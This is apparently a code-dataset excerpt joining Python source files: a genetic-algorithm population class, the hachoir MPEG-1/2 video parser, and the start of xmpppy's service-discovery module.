        self._fitness = None
        self._sorted_dna_tensor = None  # lazy cache, see get_dna_tensor()
        self._idx = 0  # number of columns filled so far

    @property
    def sorted(self):
        # "Sorted" here means fitness has been evaluated (see sort()).
        return self._fitness is not None and self._bodies is not None

    def _verify_sorted(self):
        if not self.sorted:
            raise RuntimeError('Population is not sorted.')

    def __len__(self):
        # Number of DNAs pushed so far, not the configured capacity.
        return self._idx

    def get_organization_and_fitness_at(self, index, fitness_as_tensor=True):
        """Return (Organization, fitness) for the *index*-th DNA in sorted
        order, or None when *index* is out of range.  Fitness is None before
        sorting; it is a 1-element tensor unless fitness_as_tensor=False."""
        if index < len(self):
            idx = int(self._order_by[index])
            body = self._bodies[idx] if self._bodies is not None else None
            org = Organization(dna.create(tex.idx(self._dna_tensor, tex.span, idx)), body)
            fit = None
            if self.sorted:
                if fitness_as_tensor:
                    fit = self._fitness.narrow(0, idx, 1)
                else:
                    fit = self._fitness[idx]
            return org, fit
        return None

    def get_dna_tensor(self, get_sorted=True):
        """Return the DNA matrix, by default with columns in fitness order
        (requires a prior sort()); the sorted view is cached."""
        if get_sorted:
            self._verify_sorted()
            if self._sorted_dna_tensor is None:
                self._sorted_dna_tensor = torch.index_select(self._dna_tensor, 1, self._order_by)
            return self._sorted_dna_tensor
        return self._dna_tensor

    def fill(self):
        """Populate an empty population with owner-generated seed DNA."""
        if len(self) != 0:
            raise RuntimeError('Population is not empty.')
        while len(self) != self._owner.population_size:
            self.push(self._owner.make_seed_dna())

    def push(self, item):
        """Append one or more DNA columns.

        *item* is either a tensor (1 column if 1-D, several if 2-D) or a
        2-tuple ``(elites, rest)`` of tensors that are joined column-wise
        (``elites`` may be None).
        """
        idx = self._idx
        if idx == self._owner.population_size:
            raise RuntimeError('Population is full.')
        tensor = None
        if isinstance(item, tuple):
            if len(item) != 2:
                raise ValueError('Invalid tuple length.')
            if not ((item[0] is None or torch.is_tensor(item[0])) and torch.is_tensor(item[1])):
                raise ValueError('Invalid arguments.')
            if item[0] is None:
                tensor = item[1]
            else:
                tensor = tex.join(1, item[0], item[1])
        elif torch.is_tensor(item):
            tensor = item
        else:
            raise TypeError('Unknown argument.')
        if tensor is not None:
            tensor_size = tensor.size()
            # 2-D tensors contribute one column per DNA, 1-D exactly one.
            count = tensor_size[1] if len(tensor_size) == 2 else 1
            self._dna_tensor[:, idx:idx + count] = tensor
            self._idx += count

    def calculate_fitness(self):
        """Invoke the owner callback and validate its (bodies, fitness)
        result: a list of per-DNA bodies plus a 1-D fitness tensor."""
        if self._fitness:
            raise RuntimeError('Fitness is already calculated.')
        if self._owner.population_size != len(self):
            raise RuntimeError('Population is not full.')
        res = self._owner.calculate_fitness(self._dna_tensor)
        if not isinstance(res, tuple) or len(res) != 2:
            raise TypeError('Result of "calculate_fitness" is not a tuple of length 2.')
        if not isinstance(res[0], list):
            raise TypeError('First value of result of "calculate_fitness" is not a list.')
        if len(res[0]) != len(self):
            raise ValueError(
                'First value of result of "calculate_fitness" length is not {}.'\
                .format(len(self)))
        self._bodies = res[0]
        if not torch.is_tensor(res[1]):
            raise TypeError('Second value of result of "calculate_fitness" is not a tensor.')
        self._fitness = res[1]
        if self._fitness.size() != (len(self), ):
            raise ValueError(
                'Second value of result of "calculate_fitness" dims is not ({}, ).'\
                .format(len(self)))

    def sort(self):
        """Evaluate fitness and record the ascending-fitness column order."""
        self.calculate_fitness()
        res = torch.sort(self._fitness)
        self._order_by = res[1]

    def make_crossovered_dna(self, std_dev=0.3, keep_elites_rate=0.05):
        """Select two fitness-biased parent sets (half-normal index
        distribution favours fitter DNAs) and cross them over.
        Returns (elites, crossovered_dna)."""
        elites, remaining, remaining_size =\
            self._initialize_selection(keep_elites_rate)
        idx1 =\
            (torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
        idx2 =\
            (torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
        dna_tensor1 = torch.index_select(remaining, 1, idx1)
        dna_tensor2 = torch.index_select(remaining, 1, idx2)
        crossovered = dna.crossover(dna_tensor1, dna_tensor2)
        return elites, crossovered

    def make_normal_dist_dna(self, std_dev=0.3, keep_elites_rate=0.05):
        """Resample DNAs with the same fitness-biased half-normal index
        distribution, without crossover.  Returns (elites, dna_tensor)."""
        elites, remaining, remaining_size =\
            self._initialize_selection(keep_elites_rate)
        idx =\
            (torch.abs(torch.randn(remaining_size) * std_dev) * remaining_size).clamp(max = remaining_size - 1).long()
        dna_tensor = torch.index_select(remaining, 1, idx)
        return elites, dna_tensor

    def _initialize_selection(self, keep_elites_rate):
        """Split the sorted DNA matrix into (elites, remaining,
        remaining_size).  keep_elites_rate < 1 is a fraction of the
        population; >= 1 is an absolute count; 0 keeps no elites."""
        sorted_dna_tensor = self.get_dna_tensor()
        elite_count = 0
        if keep_elites_rate > 0:
            if keep_elites_rate < 1:
                elite_count = max(round(self._owner.population_size * keep_elites_rate), 1)
            else:
                elite_count = min(self._owner.population_size, keep_elites_rate)
        if elite_count == 0:
            return None, sorted_dna_tensor, self._owner.population_size
        elites = sorted_dna_tensor[:, 0:elite_count]
        remaining = sorted_dna_tensor[:, elite_count:]
        remaining_size = self._owner.population_size - elite_count
        return elites, remaining, remaining_size
tquizzle/Sick-Beard | lib/hachoir_parser/video/mpeg_video.py | 90 | 22604 | """
Moving Picture Experts Group (MPEG) video version 1 and 2 parser.
Information:
- http://www.mpucoder.com/DVD/
- http://dvd.sourceforge.net/dvdinfo/
- http://www.mit.jyu.fi/mweber/leffakone/software/parsempegts/
- http://homepage.mac.com/rnc/EditMpegHeaderIFO.html
- http://standards.iso.org/ittf/PubliclyAvailableStandards/c025029_ISO_IEC_TR_11172-5_1998(E)_Software_Simulation.zip
This is a sample encoder/decoder implementation for MPEG-1.
Author: Victor Stinner
Creation date: 15 september 2006
"""
from lib.hachoir_parser import Parser
from lib.hachoir_parser.audio.mpeg_audio import MpegAudioFile
from lib.hachoir_core.field import (FieldSet,
FieldError, ParserError,
Bit, Bits, Bytes, RawBits, PaddingBits, NullBits,
UInt8, UInt16,
RawBytes, PaddingBytes,
Enum)
from lib.hachoir_core.endian import BIG_ENDIAN
from lib.hachoir_core.stream import StringInputStream
from lib.hachoir_core.text_handler import textHandler, hexadecimal
class FragmentGroup:
    """Collects the CustomFragment pieces of one elementary stream so they
    can later be re-parsed as a single contiguous input stream."""
    def __init__(self, parser):
        self.items = []      # CustomFragment instances, in stream order
        self.parser = parser # parser class to apply to the joined data
        self.args = {}

    def add(self, item):
        self.items.append(item)

    def createInputStream(self):
        # FIXME: Use lazy stream creation
        data = []
        for item in self.items:
            if 'rawdata' in item:
                data.append( item["rawdata"].value )
        data = "".join(data)
        # FIXME: Use smarter code to send arguments
        # NOTE: dict.iteritems() -- this module is Python 2 only.
        tags = {"class": self.parser, "args": self.args}
        tags = tags.iteritems()
        return StringInputStream(data, "<fragment group>", tags=tags)
class CustomFragment(FieldSet):
    """One raw slice of an elementary stream; all fragments sharing a
    FragmentGroup are concatenated when the grouped stream is re-parsed."""
    def __init__(self, parent, name, size, parser, description=None, group=None):
        FieldSet.__init__(self, parent, name, description, size=size)
        # First fragment of a stream creates the group; later ones join it.
        if not group:
            group = FragmentGroup(parser)
        self.group = group
        self.group.add(self)

    def createFields(self):
        yield RawBytes(self, "rawdata", self.size//8)

    def _createInputStream(self, **args):
        # Parsing this fragment's content sees the whole reassembled stream.
        return self.group.createInputStream()
class Timestamp(FieldSet):
    """33-bit PTS/DTS timestamp stored as 3+15+15 bit chunks, each chunk
    followed by a marker bit."""
    static_size = 36

    def createValue(self):
        # Reassemble the 33-bit value: c (high 3) | b (middle 15) | a (low 15).
        return (self["c"].value << 30) + (self["b"].value << 15) + self["a"].value

    def createFields(self):
        yield Bits(self, "c", 3)
        yield Bit(self, "sync[]") # =True
        yield Bits(self, "b", 15)
        yield Bit(self, "sync[]") # =True
        yield Bits(self, "a", 15)
        yield Bit(self, "sync[]") # =True
class SCR(FieldSet):
    """System Clock Reference base: 3+15+15 bit chunks with marker bits."""
    static_size = 35

    def createFields(self):
        yield Bits(self, "scr_a", 3)
        yield Bit(self, "sync[]") # =True
        yield Bits(self, "scr_b", 15)
        yield Bit(self, "sync[]") # =True
        yield Bits(self, "scr_c", 15)
class PackHeader(FieldSet):
    """Program-stream pack header; layout differs between MPEG-1 and
    MPEG-2 (detected by the first 2 bits: 01 means MPEG-2)."""
    def createFields(self):
        if self.stream.readBits(self.absolute_address, 2, self.endian) == 1:
            # MPEG version 2
            yield Bits(self, "sync[]", 2)
            yield SCR(self, "scr")
            yield Bit(self, "sync[]")
            yield Bits(self, "scr_ext", 9)
            yield Bit(self, "sync[]")
            yield Bits(self, "mux_rate", 22)
            yield Bits(self, "sync[]", 2)
            yield PaddingBits(self, "reserved", 5, pattern=1)
            yield Bits(self, "stuffing_length", 3)
            count = self["stuffing_length"].value
            if count:
                yield PaddingBytes(self, "stuffing", count, pattern="\xff")
        else:
            # MPEG version 1
            yield Bits(self, "sync[]", 4)
            yield Bits(self, "scr_a", 3)
            yield Bit(self, "sync[]")
            yield Bits(self, "scr_b", 15)
            yield Bit(self, "sync[]")
            yield Bits(self, "scr_c", 15)
            yield Bits(self, "sync[]", 2)
            yield Bits(self, "mux_rate", 22)
            yield Bit(self, "sync[]")

    def validate(self):
        """Return True when marker bits match the detected MPEG version,
        else an error message string (hachoir validate convention)."""
        if self["mux_rate"].value == 0:
            return "Invalid mux rate"
        sync0 = self["sync[0]"]
        if (sync0.size == 2 and sync0.value == 1):
            # MPEG2
            pass
            if not self["sync[1]"].value \
            or not self["sync[2]"].value \
            or self["sync[3]"].value != 3:
                return "Invalid synchronisation bits"
        elif (sync0.size == 4 and sync0.value == 2):
            # MPEG1
            if not self["sync[1]"].value \
            or not self["sync[2]"].value \
            or self["sync[3]"].value != 3 \
            or not self["sync[4]"].value:
                return "Invalid synchronisation bits"
        else:
            return "Unknown version"
        return True
class SystemHeader(FieldSet):
    """Program-stream system header: rate and stream-count bounds."""
    def createFields(self):
        yield Bits(self, "marker[]", 1)
        yield Bits(self, "rate_bound", 22)
        yield Bits(self, "marker[]", 1)
        yield Bits(self, "audio_bound", 6)
        yield Bit(self, "fixed_bitrate")
        yield Bit(self, "csps", description="Constrained system parameter stream")
        yield Bit(self, "audio_lock")
        yield Bit(self, "video_lock")
        yield Bits(self, "marker[]", 1)
        yield Bits(self, "video_bound", 5)
        # Anything beyond the fixed fields is kept raw (stream-id entries).
        length = self['../length'].value-5
        if length:
            yield RawBytes(self, "raw[]", length)
class defaultParser(FieldSet):
    """Fallback payload parser: keep the chunk content as raw bytes."""
    def createFields(self):
        yield RawBytes(self, "data", self["../length"].value)
class Padding(FieldSet):
    """Padding-stream payload: the whole content is filler."""
    def createFields(self):
        yield PaddingBytes(self, "data", self["../length"].value)
class VideoExtension2(FieldSet):
    """Second PES extension: a length-prefixed opaque blob."""
    def createFields(self):
        yield Bit(self, "sync[]") # =True
        yield Bits(self, "ext_length", 7)
        yield NullBits(self, "reserved[]", 8)
        size = self["ext_length"].value
        if size:
            yield RawBytes(self, "ext_bytes", size)
class VideoExtension1(FieldSet):
    """First PES extension: flag byte followed by the optional sections the
    flags announce (private data, pack length, sequence counter, P-STD)."""
    def createFields(self):
        yield Bit(self, "has_private")
        yield Bit(self, "has_pack_lgth")
        yield Bit(self, "has_pack_seq")
        yield Bit(self, "has_pstd_buffer")
        yield Bits(self, "sync[]", 3) # =7
        yield Bit(self, "has_extension2")

        if self["has_private"].value:
            yield RawBytes(self, "private", 16)
        if self["has_pack_lgth"].value:
            yield UInt8(self, "pack_lgth")
        if self["has_pack_seq"].value:
            yield Bit(self, "sync[]") # =True
            yield Bits(self, "pack_seq_counter", 7)
            yield Bit(self, "sync[]") # =True
            yield Bit(self, "mpeg12_id")
            yield Bits(self, "orig_stuffing_length", 6)
        if self["has_pstd_buffer"].value:
            yield Bits(self, "sync[]", 2) # =1
            yield Enum(Bit(self, "pstd_buffer_scale"),
                {True: "128 bytes", False: "1024 bytes"})
            yield Bits(self, "pstd_size", 13)
class VideoSeqHeader(FieldSet):
    """sequence_header: picture size, aspect/frame-rate codes, bitrate and
    optional intra/non-intra quantizer matrices (64 bytes each)."""
    ASPECT=["forbidden", "1.0000 (VGA etc.)", "0.6735",
            "0.7031 (16:9, 625line)", "0.7615", "0.8055",
            "0.8437 (16:9, 525line)", "0.8935",
            "0.9157 (CCIR601, 625line)", "0.9815", "1.0255", "1.0695",
            "1.0950 (CCIR601, 525line)", "1.1575", "1.2015", "reserved"]
    FRAMERATE=["forbidden", "23.976 fps", "24 fps", "25 fps", "29.97 fps",
               "30 fps", "50 fps", "59.94 fps", "60 fps"]

    def createFields(self):
        yield Bits(self, "width", 12)
        yield Bits(self, "height", 12)
        yield Enum(Bits(self, "aspect", 4), self.ASPECT)
        yield Enum(Bits(self, "frame_rate", 4), self.FRAMERATE)
        yield Bits(self, "bit_rate", 18, "Bit rate in units of 50 bytes")
        yield Bits(self, "sync[]", 1) # =1
        yield Bits(self, "vbv_size", 10, "Video buffer verifier size, in units of 16768")
        yield Bit(self, "constrained_params_flag")
        yield Bit(self, "has_intra_quantizer")
        if self["has_intra_quantizer"].value:
            for i in range(64):
                yield Bits(self, "intra_quantizer[]", 8)
        yield Bit(self, "has_non_intra_quantizer")
        if self["has_non_intra_quantizer"].value:
            for i in range(64):
                yield Bits(self, "non_intra_quantizer[]", 8)
class GroupStart(FieldSet):
    """group_start_code payload: SMPTE-style time code plus group flags."""
    def createFields(self):
        yield Bit(self, "drop_frame")
        yield Bits(self, "time_hh", 5)
        yield Bits(self, "time_mm", 6)
        yield PaddingBits(self, "time_pad[]", 1)
        yield Bits(self, "time_ss", 6)
        yield Bits(self, "time_ff", 6)
        yield Bit(self, "closed_group")
        yield Bit(self, "broken_group")
        yield PaddingBits(self, "pad[]", 5)
class PacketElement(FieldSet):
    """MPEG-2 PES packet header: flag bits followed by the optional
    timestamp/ESCR/rate/CRC/extension sections those flags announce."""
    def createFields(self):
        yield Bits(self, "sync[]", 2) # =2
        if self["sync[0]"].value != 2:
            raise ParserError("Unknown video elementary data")
        yield Bits(self, "is_scrambled", 2)
        yield Bits(self, "priority", 1)
        yield Bit(self, "alignment")
        yield Bit(self, "is_copyrighted")
        yield Bit(self, "is_original")
        yield Bit(self, "has_pts", "Presentation Time Stamp")
        yield Bit(self, "has_dts", "Decode Time Stamp")
        yield Bit(self, "has_escr", "Elementary Stream Clock Reference")
        yield Bit(self, "has_es_rate", "Elementary Stream rate")
        yield Bit(self, "dsm_trick_mode")
        yield Bit(self, "has_copy_info")
        yield Bit(self, "has_prev_crc", "If True, previous PES packet CRC follows")
        yield Bit(self, "has_extension")
        yield UInt8(self, "size")

        # Time stamps
        if self["has_pts"].value:
            yield Bits(self, "sync[]", 4) # =2, or 3 if has_dts=True
            yield Timestamp(self, "pts")
        if self["has_dts"].value:
            # A DTS is only valid together with a PTS.
            if not(self["has_pts"].value):
                raise ParserError("Invalid PTS/DTS values")
            yield Bits(self, "sync[]", 4) # =1
            yield Timestamp(self, "dts")

        if self["has_escr"].value:
            yield Bits(self, "sync[]", 2) # =0
            yield SCR(self, "escr")

        if self["has_es_rate"].value:
            yield Bit(self, "sync[]") # =True
            yield Bits(self, "es_rate", 14) # in units of 50 bytes/second
            yield Bit(self, "sync[]") # =True

        if self["has_copy_info"].value:
            yield Bit(self, "sync[]") # =True
            yield Bits(self, "copy_info", 7)

        if self["has_prev_crc"].value:
            yield textHandler(UInt16(self, "prev_crc"), hexadecimal)

        # --- Extension ---
        if self["has_extension"].value:
            yield VideoExtension1(self, "extension")
            if self["extension/has_extension2"].value:
                yield VideoExtension2(self, "extension2")
class VideoExtension(FieldSet):
    """extension_start_code payload; layout selected by the 4-bit ext_type
    (1=sequence, 2=sequence display, 8=picture coding, else raw)."""
    EXT_TYPE = {1:'Sequence',2:'Sequence Display',8:'Picture Coding'}

    def createFields(self):
        yield Enum(Bits(self, "ext_type", 4), self.EXT_TYPE)
        ext_type=self['ext_type'].value
        if ext_type==1:
            # Sequence extension
            yield Bits(self, 'profile_and_level', 8)
            yield Bit(self, 'progressive_sequence')
            yield Bits(self, 'chroma_format', 2)
            yield Bits(self, 'horiz_size_ext', 2)
            yield Bits(self, 'vert_size_ext', 2)
            yield Bits(self, 'bit_rate_ext', 12)
            yield Bits(self, 'pad[]', 1)
            yield Bits(self, 'vbv_buffer_size_ext', 8)
            yield Bit(self, 'low_delay')
            yield Bits(self, 'frame_rate_ext_n', 2)
            yield Bits(self, 'frame_rate_ext_d', 5)
        elif ext_type==2:
            # Sequence Display extension
            yield Bits(self, 'video_format', 3)
            yield Bit(self, 'color_desc_present')
            if self['color_desc_present'].value:
                yield UInt8(self, 'color_primaries')
                yield UInt8(self, 'transfer_characteristics')
                yield UInt8(self, 'matrix_coeffs')
            yield Bits(self, 'display_horiz_size', 14)
            yield Bits(self, 'pad[]', 1)
            yield Bits(self, 'display_vert_size', 14)
            yield NullBits(self, 'pad[]', 3)
        elif ext_type==8:
            # Picture Coding extension
            yield Bits(self, 'f_code[0][0]', 4, description="forward horizontal")
            yield Bits(self, 'f_code[0][1]', 4, description="forward vertical")
            yield Bits(self, 'f_code[1][0]', 4, description="backward horizontal")
            yield Bits(self, 'f_code[1][1]', 4, description="backward vertical")
            yield Bits(self, 'intra_dc_precision', 2)
            yield Bits(self, 'picture_structure', 2)
            yield Bit(self, 'top_field_first')
            yield Bit(self, 'frame_pred_frame_dct')
            yield Bit(self, 'concealment_motion_vectors')
            yield Bit(self, 'q_scale_type')
            yield Bit(self, 'intra_vlc_format')
            yield Bit(self, 'alternate_scan')
            yield Bit(self, 'repeat_first_field')
            yield Bit(self, 'chroma_420_type')
            yield Bit(self, 'progressive_frame')
            yield Bit(self, 'composite_display')
            if self['composite_display'].value:
                yield Bit(self, 'v_axis')
                yield Bits(self, 'field_sequence', 3)
                yield Bit(self, 'sub_carrier')
                yield Bits(self, 'burst_amplitude', 7)
                yield Bits(self, 'sub_carrier_phase', 8)
                yield NullBits(self, 'pad[]', 2)
            else:
                yield NullBits(self, 'pad[]', 6)
        else:
            # Unknown extension type: keep the remaining nibble raw.
            yield RawBits(self, "raw[]", 4)
class VideoPicture(FieldSet):
    """picture_start_code payload: temporal reference, frame coding type
    and motion-vector codes for P/B frames."""
    CODING_TYPE = ["forbidden","intra-coded (I)",
                   "predictive-coded (P)",
                   "bidirectionally-predictive-coded (B)",
                   "dc intra-coded (D)", "reserved",
                   "reserved", "reserved"]

    def createFields(self):
        yield Bits(self, "temporal_ref", 10)
        yield Enum(Bits(self, "coding_type", 3), self.CODING_TYPE)
        yield Bits(self, "vbv_delay", 16)
        if self['coding_type'].value in (2,3):
            # predictive coding
            yield Bit(self, 'full_pel_fwd_vector')
            yield Bits(self, 'forward_f_code', 3)
            if self['coding_type'].value == 3:
                # bidi predictive coding
                yield Bit(self, 'full_pel_back_vector')
                yield Bits(self, 'backward_f_code', 3)
        # Align the field set to the next byte boundary.
        yield Bits(self, "padding", 8-(self.current_size % 8))
class VideoSlice(FieldSet):
    """Picture slice: quantizer scale plus opaque macroblock data running
    up to the next start code (or end of stream)."""
    def createFields(self):
        yield Bits(self, "quantizer_scale", 5)
        start=self.absolute_address+self.current_size+3
        pos=self.stream.searchBytes('\0\0\1',start,start+1024*1024*8) # seek forward by at most 1MB
        if pos is None: pos=self.root.size
        yield RawBits(self, "data", pos-start+3)
class VideoChunk(FieldSet):
    """Elementary video stream chunk: start code 00 00 01, tag byte, and a
    tag-specific payload (picture/sequence/group headers, slices, ...)."""
    tag_info = {
        0x00: ("pict_start[]", VideoPicture, "Picture start"),
        0xB2: ("data_start[]", None, "Data start"),
        0xB3: ("seq_hdr[]", VideoSeqHeader,"Sequence header"),
        0xB4: ("seq_err[]", None, "Sequence error"),
        0xB5: ("ext_start[]", VideoExtension,"Extension start"),
        0xB7: ("seq_end[]", None, "Sequence end"),
        0xB8: ("group_start[]", GroupStart, "Group start"),
    }

    def __init__(self, *args):
        FieldSet.__init__(self, *args)
        # Pick name/parser/description from the tag byte before parsing.
        tag = self["tag"].value
        if tag in self.tag_info:
            self._name, self.parser, self._description = self.tag_info[tag]
            if not self.parser:
                self.parser = defaultParser
        elif 0x01 <= tag <= 0xaf:
            self._name, self.parser, self._description = ('slice[]', VideoSlice, 'Picture slice')
        else:
            self.parser = defaultParser

    def createFields(self):
        yield Bytes(self, "sync", 3)
        yield textHandler(UInt8(self, "tag"), hexadecimal)
        # 0xb7 (sequence end) has no payload.
        if self.parser and self['tag'].value != 0xb7:
            yield self.parser(self, "content")
class VideoStream(Parser):
    """Sequence of VideoChunk fields; used to re-parse the reassembled
    fragments of a video elementary stream."""
    endian = BIG_ENDIAN

    def createFields(self):
        while self.current_size < self.size:
            pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB
            if pos is not None:
                padsize = pos-self.current_size
                if padsize:
                    yield PaddingBytes(self, "pad[]", padsize//8)
            yield VideoChunk(self, "chunk[]")
class Stream(FieldSet):
    """PES stream payload: skips stuffing bytes, decodes the MPEG-1 header
    variants (buffer size / timestamps) or the MPEG-2 PacketElement, then
    hands the remaining bytes to the stream's FragmentGroup."""
    def createFields(self):
        padding=0
        position=0
        while True:
            # Peek one byte ahead without consuming it.
            next=ord(self.parent.stream.readBytes(self.absolute_address+self.current_size+position, 1))
            if next == 0xff:
                # 0xff stuffing byte: keep counting.
                padding+=1
                position+=8
            elif padding:
                yield PaddingBytes(self, "pad[]", padding)
                padding=None
                position=0
            elif 0x40 <= next <= 0x7f:
                # MPEG-1 STD buffer size field.
                yield Bits(self, "scale_marker", 2) # 1
                yield Bit(self, "scale")
                scale=self['scale'].value
                if scale:
                    scaleval=1024
                else:
                    scaleval=128
                yield textHandler(Bits(self, "size", 13), lambda field:str(field.value*scaleval))
            elif 0x00 <= next <= 0x3f:
                # MPEG-1 PTS/DTS block, then payload follows.
                yield Bits(self, "ts_marker", 2) # 0
                yield Bit(self, "has_pts")
                yield Bit(self, "has_dts")
                if self['has_pts'].value:
                    yield Timestamp(self, "pts")
                if self['has_dts'].value:
                    yield PaddingBits(self, "pad[]", 4)
                    yield Timestamp(self, "dts")
                if self.current_size % 8 == 4:
                    yield PaddingBits(self, "pad[]", 4)
                break
            elif 0x80 <= next <= 0xbf:
                # MPEG-2 extension
                yield PacketElement(self, "pkt")
                break
            else:
                # 0xc0 - 0xfe: unknown
                break
        # Remaining payload joins the per-tag fragment group so the whole
        # elementary stream can be re-parsed later.
        length = self["../length"].value - self.current_size//8
        if length:
            tag=self['../tag'].value
            group=self.root.streamgroups[tag]
            parname=self.parent._name
            if parname.startswith('audio'):
                frag = CustomFragment(self, "data", length*8, MpegAudioFile, group=group)
            elif parname.startswith('video'):
                frag = CustomFragment(self, "data", length*8, VideoStream, group=group)
            else:
                frag = CustomFragment(self, "data", length*8, None, group=group)
            self.root.streamgroups[tag]=frag.group
            yield frag
class Chunk(FieldSet):
    """Program-stream chunk: 00 00 01 sync, tag byte, then a tag-specific
    payload (pack header, system header, or a PES stream packet)."""
    ISO_END_CODE = 0xB9
    tag_info = {
        0xB9: ("end", None, "End"),
        0xBA: ("pack_start[]", PackHeader, "Pack start"),
        0xBB: ("system_start[]", SystemHeader, "System start"),
        # streams
        0xBD: ("private[]", Stream, "Private elementary"),
        0xBE: ("padding[]", Stream, "Padding"),
        # 0xC0 to 0xFE handled specially
        0xFF: ("directory[]", Stream, "Program Stream Directory"),
    }

    def __init__(self, *args):
        FieldSet.__init__(self, *args)
        # Lazily create the per-tag fragment-group registry on the root.
        if not hasattr(self.root,'streamgroups'):
            self.root.streamgroups={}
            for tag in range(0xBC, 0x100):
                self.root.streamgroups[tag]=None
        tag = self["tag"].value
        if tag in self.tag_info:
            self._name, self.parser, self._description = self.tag_info[tag]
        elif 0xBC <= tag <= 0xFF:
            if 0xC0 <= tag < 0xE0:
                # audio
                streamid = tag-0xC0
                self._name, self.parser, self._description = ("audio[%i][]"%streamid, Stream, "Audio Stream %i Packet"%streamid)
            elif 0xE0 <= tag < 0xF0:
                # video
                streamid = tag-0xE0
                self._name, self.parser, self._description = ("video[%i][]"%streamid, Stream, "Video Stream %i Packet"%streamid)
            else:
                self._name, self.parser, self._description = ("stream[]", Stream, "Data Stream Packet")
        else:
            self.parser = defaultParser
        if not self.parser:
            self.parser = defaultParser
        elif self.parser != PackHeader and "length" in self:
            # All chunk types except the pack header carry a 16-bit length.
            self._size = (6 + self["length"].value) * 8

    def createFields(self):
        yield Bytes(self, "sync", 3)
        yield textHandler(UInt8(self, "tag"), hexadecimal)
        if self.parser:
            if self.parser != PackHeader:
                yield UInt16(self, "length")
                if not self["length"].value:
                    return
            yield self.parser(self, "content")

    def createDescription(self):
        return "Chunk: tag %s" % self["tag"].display
class MPEGVideoFile(Parser):
    """Top-level MPEG-1/2 program stream parser (sequence of Chunk fields)."""
    PARSER_TAGS = {
        "id": "mpeg_video",
        "category": "video",
        "file_ext": ("mpeg", "mpg", "mpe", "vob"),
        "mime": (u"video/mpeg", u"video/mp2p"),
        "min_size": 12*8,
        #TODO: "magic": xxx,
        "description": "MPEG video, version 1 or 2"
    }
    endian = BIG_ENDIAN
    version = None  # cached by getVersion()

    def createFields(self):
        while self.current_size < self.size:
            pos=self.stream.searchBytes('\0\0\1',self.current_size,self.current_size+1024*1024*8) # seek forward by at most 1MB
            if pos is not None:
                padsize = pos-self.current_size
                if padsize:
                    yield PaddingBytes(self, "pad[]", padsize//8)
            chunk=Chunk(self, "chunk[]")
            try:
                # force chunk to be processed, so that CustomFragments are complete
                chunk['content/data']
            except: pass
            yield chunk

    def validate(self):
        """Hachoir convention: True on success, error message otherwise."""
        try:
            pack = self[0]
        except FieldError:
            return "Unable to create first chunk"
        if pack.name != "pack_start[0]":
            return "Invalid first chunk"
        if pack["sync"].value != "\0\0\1":
            return "Invalid synchronisation"
        return pack["content"].validate()

    def getVersion(self):
        # Pack-header sync field is 2 bits in MPEG-2, 4 bits in MPEG-1.
        if not self.version:
            if self["pack_start[0]/content/sync[0]"].size == 2:
                self.version = 2
            else:
                self.version = 1
        return self.version

    def createDescription(self):
        if self.getVersion() == 2:
            return "MPEG-2 video"
        else:
            return "MPEG-1 video"
| gpl-3.0 |
coderb0t/CouchPotatoServer | libs/xmpp/features.py | 199 | 8578 | ## features.py
##
## Copyright (C) 2003-2004 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: features.py,v 1.25 2009/04/07 07:11:48 snakeru Exp $
"""
This module contains variable stuff that is not worth splitting into separate modules.
Here is:
DISCO client and agents-to-DISCO and browse-to-DISCO emulators.
IBR and password manager.
jabber:iq:privacy methods
All these methods takes 'disp' first argument that should be already connected
(and in most cases already authorised) dispatcher instance.
"""
from protocol import *
# Event name fired on the dispatcher when registration form data arrives.
REGISTER_DATA_RECEIVED='REGISTER DATA RECEIVED'
### DISCO ### http://jabber.org/protocol/disco ### JEP-0030 ####################
### Browse ### jabber:iq:browse ### JEP-0030 ###################################
### Agents ### jabber:iq:agents ### JEP-0030 ###################################
def _discover(disp,ns,jid,node=None,fb2b=0,fb2a=1):
    """ Try to obtain info from the remote object.
        If remote object doesn't support disco fall back to browse (if fb2b is true)
        and if it doesnt support browse (or fb2b is not true) fall back to agents protocol
        (if gb2a is true). Returns obtained info. Used internally. """
    iq=Iq(to=jid,typ='get',queryNS=ns)
    if node: iq.setQuerynode(node)
    rep=disp.SendAndWaitForResponse(iq)
    if fb2b and not isResultNode(rep): rep=disp.SendAndWaitForResponse(Iq(to=jid,typ='get',queryNS=NS_BROWSE))   # Fallback to browse
    if fb2a and not isResultNode(rep): rep=disp.SendAndWaitForResponse(Iq(to=jid,typ='get',queryNS=NS_AGENTS))   # Fallback to agents
    # Only child Nodes of the query payload are returned (text is dropped).
    if isResultNode(rep): return [n for n in rep.getQueryPayload() if isinstance(n, Node)]
    return []
def discoverItems(disp,jid,node=None):
    """ Query remote object about any items that it contains. Return items list. """
    """ According to JEP-0030:
        query MAY have node attribute
        item: MUST HAVE jid attribute and MAY HAVE name, node, action attributes.
        action attribute of item can be either of remove or update value."""
    ret=[]
    for i in _discover(disp,NS_DISCO_ITEMS,jid,node):
        # Normalise legacy jabber:iq:agents entries to disco-style attrs.
        if i.getName()=='agent' and i.getTag('name'): i.setAttr('name',i.getTagData('name'))
        ret.append(i.attrs)
    return ret
def discoverInfo(disp,jid,node=None):
    """ Query remote object about info that it publishes. Returns identities and features lists."""
    """ According to JEP-0030:
        query MAY have node attribute
        identity: MUST HAVE category and name attributes and MAY HAVE type attribute.
        feature: MUST HAVE var attribute"""
    identities , features = [] , []
    for i in _discover(disp,NS_DISCO_INFO,jid,node):
        if i.getName()=='identity': identities.append(i.attrs)
        elif i.getName()=='feature': features.append(i.getAttr('var'))
        elif i.getName()=='agent':
            # Legacy agents reply: map its tags onto disco identities/features.
            if i.getTag('name'): i.setAttr('name',i.getTagData('name'))
            if i.getTag('description'): i.setAttr('name',i.getTagData('description'))
            identities.append(i.attrs)
            if i.getTag('groupchat'): features.append(NS_GROUPCHAT)
            if i.getTag('register'): features.append(NS_REGISTER)
            if i.getTag('search'): features.append(NS_SEARCH)
    return identities , features
### Registration ### jabber:iq:register ### JEP-0077 ###########################
